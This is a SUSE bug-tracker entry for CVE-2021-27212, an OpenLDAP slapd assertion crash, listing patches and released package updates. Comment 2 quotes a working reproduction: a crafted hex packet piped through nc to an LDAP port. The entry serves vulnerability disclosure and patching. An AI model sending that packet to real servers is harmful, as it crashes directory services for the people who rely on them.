Bug 1182279 - (CVE-2021-27212) VUL-0: CVE-2021-27212: openldap2,openldap2-client,openldap2-client-openssl1: A malicious packet can force OpenLDAP to fail an assertion and crash
(CVE-2021-27212)
VUL-0: CVE-2021-27212: openldap2,openldap2-client,openldap2-client-openssl1: ...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/277931/
CVSSv3.1:SUSE:CVE-2021-27212:7.5:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2021-02-15 14:55 UTC by Gianluca Gabrielli
Modified: 2021-06-21 09:13 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Gianluca Gabrielli 2021-02-15 14:55:25 UTC
CVE-2021-27212

In OpenLDAP through 2.4.57 and 2.5.x through 2.5.1alpha, an assertion failure in
slapd can occur in the issuerAndThisUpdateCheck function via a crafted packet,
resulting in a denial of service (daemon exit) via a short timestamp. This is
related to schema_init.c and checkTime.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27212
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27212
https://git.openldap.org/openldap/openldap/-/commit/3539fc33212b528c56b716584f2c2994af7c30b0
https://git.openldap.org/openldap/openldap/-/commit/9badb73425a67768c09bcaed1a9c26c684af6c30
https://bugs.openldap.org/show_bug.cgi?id=9454
Comment 1 Gianluca Gabrielli 2021-02-15 15:01:55 UTC
Upstream patch available for 2.4 [0] and 2.5 [1] branches.

Affected packages are shipped from the following codestreams:
 * openldap2
   - SUSE:SLE-11-SP1:Update
   - SUSE:SLE-11-SP3:Update
   - SUSE:SLE-12:Update
   - SUSE:SLE-12-SP2:Update
   - SUSE:SLE-15:Update
 * openldap2-client 	
   - SUSE:SLE-11-SP1:Update	
   - SUSE:SLE-11-SP3:Update
   - SUSE:SLE-12-SP2:Update
 * openldap2-client-openssl1 	
   - SUSE:SLE-11-SP1:Update
   - SUSE:SLE-11-SP3:Update

[0] https://git.openldap.org/openldap/openldap/-/commit/9badb73425a67768c09bcaed1a9c26c684af6c30.diff
[1] https://git.openldap.org/openldap/openldap/-/commit/e2acb7c77f981e9dc3d35cc1ad6d78dd2722aa5c.diff
Comment 2 Gianluca Gabrielli 2021-02-15 15:07:38 UTC
As described by the author of this finding [0], to reproduce the bug the following string can be sent to port 1389 of a running service:

echo -en '\x30\x82\x01\x6a\x02\x01\x30\x63\x30\xdf\xdf\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\xa0\x82\x01\x30\x30\x00\x30\x09\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\xa9\x30\x81\x09\x32\x2e\x35\x2e\x31\x33\x2e\x33\x38\x83\x2e\x7b\x20\x20\x20\x20\x74\x68\x69\x73\x55\x70\x64\x61\x74\x65\x20\x20\x20\x20\x20\x22\x22\x20\x2c\x69\x73\x73\x75\x45\x72\x20\x72\x64\x6e\x53\x65\x71\x75\x65\x6e\x63\x65\x3a\x22\x22\x7d\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389

[0] https://bugs.openldap.org/show_bug.cgi?id=9454#c0
Comment 4 Swamp Workflow Management 2021-03-03 20:18:48 UTC
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud Crowbar 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 7 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    openldap2-2.4.41-18.83.1
HPE Helion Openstack 8 (src):    openldap2-2.4.41-18.83.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 5 Swamp Workflow Management 2021-03-03 20:23:27 UTC
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-39.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 6 Swamp Workflow Management 2021-03-08 20:19:52 UTC
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Retail Branch Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Proxy 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Enterprise Storage 6 (src):    openldap2-2.4.46-9.48.1
SUSE CaaS Platform 4.0 (src):    openldap2-2.4.46-9.48.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Swamp Workflow Management 2021-03-14 17:33:31 UTC
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    openldap2-2.4.46-lp152.14.18.1
Comment 10 Swamp Workflow Management 2021-04-16 13:16:09 UTC
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.74.26.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Marcus Meissner 2021-06-21 09:13:43 UTC
all done